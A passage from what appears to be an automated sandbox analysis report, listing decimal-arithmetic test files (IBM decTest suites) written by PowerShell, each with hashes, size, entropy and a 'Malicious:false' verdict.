                                                                                                                                                                                                                      SHA-256:5FF7CB373834E083FB6ABBBB8F7B32FFE4E814B4619BB1AB12DB352E37B6A98D
                                                                                                                                                                                                                      SHA-512:080CBC55F8D2FAE0AEE2CD0BEFFFB43743F5A7B20CEDB9B1AE8BFB6578432E3ECF2D6C3BA1824CF062895BA7F54E391073680048B5C704D793FD4760CA4E6CD9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddSameQuantum.decTest -- check decDouble quantums match --..-- Copyright (c) IBM Corporation, 2001, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12787
                                                                                                                                                                                                                      Entropy (8bit):4.576699162189222
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:8sDxA8nAsAUAYETAQ5ANvfyxx3X7P0kfUXbykh/DRxYIqGcC6SG7Pu3019ASAi5+:8sDxA8nAsAUAYETAQ5ANvfyxx3X7P0ku
                                                                                                                                                                                                                      MD5:3B7721554527DF76E8C219F6056F5837
                                                                                                                                                                                                                      SHA1:63D85B970295EDFF50FB7D1CFED1032AFEAD7F02
                                                                                                                                                                                                                      SHA-256:C9980E5FF85C23FCC04BB3A4604453A0109A66A09AB4097F4ACB732D487F6B15
                                                                                                                                                                                                                      SHA-512:18FE9838956DF68D4FDAB8D1CEC30B8437BAA2B1E9AF0BF80D88A963961673A7440A8A02396D691C84DACA439174E681C48E7E2E0E6A99D9972ECD72A1BF8FFF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddScalebB.decTest -- scale a decDouble by powers of 10 --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):13411
                                                                                                                                                                                                                      Entropy (8bit):4.408724639300461
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:0koQEHdjPI8Y9w8VVyoIUsHs9Mwi5WX4FcD:OdjPI8r4ok
                                                                                                                                                                                                                      MD5:44BB3E8A744089016834BB4DEE564B97
                                                                                                                                                                                                                      SHA1:2F72A8335D44FDA70E9D0BF3E7FBC26C60D6116A
                                                                                                                                                                                                                      SHA-256:D6D0B87D77619EC3F6D67460984E588687071CB02E4A4B746BD7405BE1E655EC
                                                                                                                                                                                                                      SHA-512:53311E724C8945ACC3291708BCD9DE4D786D09A55BE9845041F237332BF63532C8348653A91704253C95F318ACA0AB055664DA203553ECB39A4EA33AEE68231D
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddShift.decTest -- shift decDouble coefficient left or right --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):35398
                                                                                                                                                                                                                      Entropy (8bit):4.763362004487015
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:JSFqM4YNen2oWwWwbCseWiPNlrJnhAkFBFawLz6xU7:JSFNen2oWwWwb1iPNlrJnhAkFHH
                                                                                                                                                                                                                      MD5:C02BA81746BD548EDA47380E602F7D94
                                                                                                                                                                                                                      SHA1:DD7A7D4556A5B707431BB433EF7BA9E78888E257
                                                                                                                                                                                                                      SHA-256:0DE64A3C875C46CDBFC08AA2C915E5BA6F6E40961605DD840AC2D80D95414BAE
                                                                                                                                                                                                                      SHA-512:D25E7CF8B39FE58A26C930AAC54F9F667F4A78D4D862CFC55A711CC527636FDE9232BB37CDF14965BD11B5E70CF4AB52DF717C88A71C7EEBADF32037F843CF42
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddSubtract.decTest -- decDouble subtraction --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):12192
                                                                                                                                                                                                                      Entropy (8bit):4.628010707137765
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:ukoDwTxJ9b6Im4Kd+tnkG8wYs5FeeqW0rY2f9EuzMOjb//XySvPbjLmmhHRK4XTQ:eOx7b6gPis++uzHSY4
                                                                                                                                                                                                                      MD5:0340F68E2303508B776C747A9098F801
                                                                                                                                                                                                                      SHA1:709BBEE2E761E301E8F92BB6D538C69C9745721A
                                                                                                                                                                                                                      SHA-256:8DCABFA9EE4172C5A8E97BD82B8FAADB7E790353E1CB9B9A05C05717690BC382
                                                                                                                                                                                                                      SHA-512:66D220776A4A4B8A0E4419DD97F3BDED77760FC10E4D16420B14EB3B7D7D2CD298E762D630741F1C2DDCFB278A1EBE7FAB2ADF850876D21FCA65AB42C4492FBB
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddToIntegral.decTest -- round Double to integral value --..-- Copyright (c) IBM Corporation, 2001, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):17702
                                                                                                                                                                                                                      Entropy (8bit):4.279284812943785
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:NkoQpqI4xXCvNEXWrrmoSM/2Fcfy28gfIMDNaQbMJ/:nweofIMDNNbMJ/
                                                                                                                                                                                                                      MD5:8C4C2FE15029FB0ECD010582832F6577
                                                                                                                                                                                                                      SHA1:6C06AF4061662702AFE4DD770D2975A12E26C718
                                                                                                                                                                                                                      SHA-256:CBBBE38878AB88707A889B9C4A90EE3E8A1413DACB31EA467899C46E096C86D9
                                                                                                                                                                                                                      SHA-512:A39B9BB015000AEB8441506251CFB1E6B7C5217A65431DE33B67858093DCAE4D37595CA92ED038897776E6EF8C74F5C1FA56D8082EF78B52098E8A6C898FB147
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- ddXor.decTest -- digitwise logical XOR for decDoubles --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2209
                                                                                                                                                                                                                      Entropy (8bit):4.2458832449250465
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24:LyvCqcyrr6AQnSrQYTR5wLFQAqBtySWvcLwPljryLlP0F5sh5YrT:LUC06AQnUTUQRBtySSPl2Lt0fsh5uT
                                                                                                                                                                                                                      MD5:AFF6CF2D15EA813711604A97BCDF1043
                                                                                                                                                                                                                      SHA1:0849A371E6EAC65622C02168D0881610BF161704
                                                                                                                                                                                                                      SHA-256:840282CED7520A9C5FDBDC4A98164690E3FCD1ACC6DFCB049D9A669AD4A70C6A
                                                                                                                                                                                                                      SHA-512:8805FF8819ADBE01F33E4BEC687BE85746975B286DD756110FA6978E0ED638554186095F54286E9F8E9818DE8153ABBA7E293FA9C8C59A0E73B6E283811A2CAA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- decDouble.decTest -- run all decDouble decimal arithmetic tests --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2207
                                                                                                                                                                                                                      Entropy (8bit):4.2936042494618984
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:L106AQnUTUQRBtySrgjpFoIzA7eR5XhkKt:L10iiUQ7tJMpJzieRVh3
                                                                                                                                                                                                                      MD5:6D3A49FCC0C2B5B64D026B0E4E6FD555
                                                                                                                                                                                                                      SHA1:9B16476169FEA30396CF24226D845A37EE985F0B
                                                                                                                                                                                                                      SHA-256:D3254E8174E0D90C33B6F22CD3462E0691EAE840D2A2B85D2E7446708B92F485
                                                                                                                                                                                                                      SHA-512:A026A3A339E0C78B19F785991A8D4A63972FA10E4C883D89BDA50ACFE629687898878F590A1F59395AC7DA1A2A6B71CF7C41BD480BABAECC9E2BEAED770A103C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- decQuad.decTest -- run all decQuad decimal arithmetic tests --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):1456
                                                                                                                                                                                                                      Entropy (8bit):3.8190106089798075
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:LVysyu2cqBbHymFVVr6AQ1JQUxSINcQYTR5wwSzTZeOQAhQBhMvMVmcZDnyWFKFY:LQsyCqcyrr6AQnSrQYTR5wLFQAqBtyS3
                                                                                                                                                                                                                      MD5:FADD1F3B45A6D2D20683B67E031AB8C7
                                                                                                                                                                                                                      SHA1:1B1C12FD22475AB12E0EDD8C35D0A61B4306E2BC
                                                                                                                                                                                                                      SHA-256:E8D2B6170049DA06C710B873AD6F79072F94B96800C71AD8A079695C72217B40
                                                                                                                                                                                                                      SHA-512:E470C40591A6D85C8DAE521839998A98350EE8EAA41F52B46D964343287E691DAE82AD6643B3582D627455C44A86961432D1CBDE85D0EB34EBAD4A8EFD579FE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- decSingle.decTest -- run all decSingle decimal arithmetic tests --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):37804
                                                                                                                                                                                                                      Entropy (8bit):4.629416078165434
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:CinARSkfqIXfqNGFAeFp7CTrkLDaxNl3SrCVZ0EhsTyhtc3whaLYZfhvLSpck9iH:mf3A9j+e1zG2Oh8v3A+
                                                                                                                                                                                                                      MD5:23ED8BB51DFF9578C0255021E343BF9A
                                                                                                                                                                                                                      SHA1:5B5E6685E91E2EC7C9B709BC9D9D7BAA493816AE
                                                                                                                                                                                                                      SHA-256:489BC96D1116A30F307DF03858B93B9771B444ADE53CD13799995D5883F92528
                                                                                                                                                                                                                      SHA-512:3359BCAE5BC9C647A5C6312B3815790034897E309EC821B10F2076DAED4740F798B2C82AE6CDF6628C0EF279FF19FE17AEC5F7342556B0A0DE7616BF8FDC29F9
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- divide.decTest -- decimal division --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):20436
                                                                                                                                                                                                                      Entropy (8bit):4.352937896985921
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:CFF4E1yKaqL0EcgH4O1fmBxBtJmLmOAuBK+ZD/G:CYE1yKaqL0EcgH4O1fmBxBtJmLmOAuBI
                                                                                                                                                                                                                      MD5:82C1348181A9CCC29E9823E6171B9962
                                                                                                                                                                                                                      SHA1:83D5A32BA0888AE9E154F985837DD72385D9A536
                                                                                                                                                                                                                      SHA-256:A1D3DE269327678D81F59EA754B48FAC3F1E634D6DF20DB84E1BB844577868A4
                                                                                                                                                                                                                      SHA-512:10DE48FAC8414841FD455F8E651E4EBEBED874EFB33BC8919AC517D48C1FBA62F85DDE6D71B32C7C374C9046ED5315E3A032A6538C643BDB1125FC6D0DCE53D4
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------.-- divideint.decTest -- decimal integer division --.-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --.------------------------------------------------------------------------.-- Please see the document "General Decimal Arithmetic Testcases" --.-- at http://www2.hursley.ibm.com/decimal for the description of --.-- these testcases. --.-- --.-- These testcases are experimental ('beta' versions), and they --.-- may contain errors. They are offered on an as-is basis. In --.-- particular, achieving the same results as the tests here is not --.-- a guarantee that an implementation complies with any Standard --.-- or specification. The tests are not exhaustive. --.--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):5275
                                                                                                                                                                                                                      Entropy (8bit):4.570115437022414
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:LloBkGiQHdaUW9MACnulFWvFFFFFFFFrFFFFFFFFGFFFFFFFFrFFFFFFFFYuB:Ako7pJulFqFFFFFFFFrFFFFFFFFGFFFZ
                                                                                                                                                                                                                      MD5:0248AD3491CDC6FDC04F4C7C48C74151
                                                                                                                                                                                                                      SHA1:8D718FCEF23B4BF60B8A41C8D47E6607BACD8080
                                                                                                                                                                                                                      SHA-256:02F2AA0E6DDC6C1C96A781890237BE3905CFB1F86B3DD7879EC42FBFF62DDF28
                                                                                                                                                                                                                      SHA-512:207060D5EB6D8AD30644DAE49BBFD689E95A78E01E942D9948BAF4070321616EDF1651F2CEC199F5353D6F6C51432630B22C5390C845521CA57E7F3ED8802EC2
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqAbs.decTest -- decQuad absolute value, heeding sNaN --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):89197
                                                                                                                                                                                                                      Entropy (8bit):4.429256788886768
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:/VpDIupce1TQlYhT/Mo9zy1xaYVwL9C7M2ZhjY+oGtmx913hXNOY3bfDvL3DsoVU:/VpUuv1TQA9mx137bnobs
                                                                                                                                                                                                                      MD5:10997F2DABB6088D04D390C136F0CF20
                                                                                                                                                                                                                      SHA1:D020C4238D2273DF7FC24487F9C576ABC9BCFB02
                                                                                                                                                                                                                      SHA-256:C177A8BE4D5C325DB9C8357907B046BCF3160FE998192C81DA2B3B756CC31ED7
                                                                                                                                                                                                                      SHA-512:6CE35AA09AF075EC4558D292BE52788AF3734A3CC6C44CF5379E2DF8E500CA8F4DE106770EC8A87B02F4EB8B51F36385D0127E87F6FD4F487A89A58B8E152EC5
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqAdd.decTest -- decQuad addition --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):29123
                                                                                                                                                                                                                      Entropy (8bit):3.592696921421894
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:wkoetIJrSoxAGUqgu86gEwf3APclKMjrHwkDkyF:NtIJrlpwfqclKAoM
                                                                                                                                                                                                                      MD5:25A84FCB1EB37FF72C01C0495C8C6EA5
                                                                                                                                                                                                                      SHA1:17BF566EC50F3894966BD973688882503ADD1292
                                                                                                                                                                                                                      SHA-256:B96E688D667631F55C2373C8B82B13A535DB30231DEF9F9FEAB8CE5196E04D96
                                                                                                                                                                                                                      SHA-512:B6E4C8EABAD3CDA2E3476BF08F1C4B8CA46109D29451DF25973D9CF560E22A3C07C20C0AF84DEE628FBEA7C89A35CA4D2A23BE06706BB05A9080329C060ADFEC
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqAnd.decTest -- digitwise logical AND for decQuads --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):58955
                                                                                                                                                                                                                      Entropy (8bit):4.843346813131539
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:Xbf2P0EvKlD44/+vn2tC9cEnRlDY5XcUvFqZqJitFZ+U5WRyo+zhnUAX/+0u85Xp:ScnJGVxanOP35Z
                                                                                                                                                                                                                      MD5:67EFDD383B5B047DAF4441442EA8A370
                                                                                                                                                                                                                      SHA1:B137B82BF32E443786DE11440C7C19A26C441C1F
                                                                                                                                                                                                                      SHA-256:766B3086D3B98EDE72CD5C9F98ECA908FD9A72410B2679A0C6AA2E9E39C25430
                                                                                                                                                                                                                      SHA-512:240C4E3E527F40D9492498D67E4BC2A7E6A084F7BF7832063A355CAD715AF9BFCFB7C0075CF597A0D7251B8048A62D6C41E9CCFF1E036337C1BCD509B1D20C2C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqBase.decTest -- base decQuad <--> string conversions --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):27319
                                                                                                                                                                                                                      Entropy (8bit):3.99676146177078
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:gkoftjmsuiRXNttK2H5HaNhcJxxROXay6TMIU7wSeBjRgDb9ji2a5GiA9zlwZc:Ojf7/5JCeBj6
                                                                                                                                                                                                                      MD5:FDADAF08CE0DCB815ABD57FC08B199D8
                                                                                                                                                                                                                      SHA1:34305B4A6B5C7C0282ACAD635196349CCA89D6A3
                                                                                                                                                                                                                      SHA-256:98CA9B069D126DEE02241B449754A110DDEB06011501741B2C0DA718C417B7C9
                                                                                                                                                                                                                      SHA-512:EA8B903A07B2AAFDF4E9E3910CCCD5E431D66EADA5EC1D49DD2D60E73CC1069DAB36DCCA1A9304BDD61ADA2D4A871A3C155D3DCCA100F52A110216F574ABA83F
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCanonical.decTest -- test decQuad canonical results --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):4020
                                                                                                                                                                                                                      Entropy (8bit):4.013716252201523
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:LJlH/AQqBKGiQwedyvAf9/hy9YNbgvIUs0CzPdnZUbdc:LJloBkGiQHdaPYYeld
                                                                                                                                                                                                                      MD5:9D75C4F9E13FF57189EB426581B912CF
                                                                                                                                                                                                                      SHA1:F59F18916E8054F15E049DD7D7868D14149C1E69
                                                                                                                                                                                                                      SHA-256:07AD418102A9060278D1E79A430B95EB5CD3DD7B571586A47DB5155B7F2BB02F
                                                                                                                                                                                                                      SHA-512:21739E5C34C2396C5C7ADD89B3F0F1F1B5661A21C990F30B8BD5F71247428CE91973CAB42BE36A1545C482EA691150205B4F3251CEB08619AFC06914080AC0CF
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqClass.decTest -- decQuad Class operations --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):33122
                                                                                                                                                                                                                      Entropy (8bit):4.329765604901527
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:bkoV9iOd3fIVLtoT75GYHdItLftFHGLmWx73nW+CzWuWR7MJ+SwZrl6Jy6y1L:j9iOd3fVLXMESwZB6Jyx
                                                                                                                                                                                                                      MD5:E6EB6D400CBC65919AE9AD311986F104
                                                                                                                                                                                                                      SHA1:987F2F5950E592DFD8B21D156A71224D206DD896
                                                                                                                                                                                                                      SHA-256:58F5709D1FE760C0FFFBB8A2BF39E1F6C1BDF3D36D324A179C52686FAA549F47
                                                                                                                                                                                                                      SHA-512:17676925D9503962FED42FA01A790C38F95E1C76D8B7F46AFF23152A97BA4155F5B9430C30B82B047102AB540D9C622F8999B08F1F4DC802CAA8DBF8C8E2DF31
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:------------------------------------------------------------------------..-- dqCompare.decTest -- decQuad comparison that allows quiet NaNs --..-- Copyright (c) IBM Corporation, 1981, 2008. All rights reserved. --..------------------------------------------------------------------------..-- Please see the document "General Decimal Arithmetic Testcases" --..-- at http://www2.hursley.ibm.com/decimal for the description of --..-- these testcases. --..-- --..-- These testcases are experimental ('beta' versions), and they --..-- may contain errors. They are offered on an as-is basis. In --..-- particular, achieving the same results as the tests here is not --..-- a guarantee that an implementation complies with any Standard --..-- or specification. The tests are not exhaustive. --..--
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):29695
                                                                                                                                                                                                                      Entropy (8bit):4.55507355488499
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:ullouY2bY5vyoNBRBW1gx7bi8SoR2jTflcReQLseic2kt0jRS17PdrstsrRC1vDG:l4wr
                                                                                                                                                                                                                      MD5:9F643F9E04DB79FB1A81AB74FF2B6A27
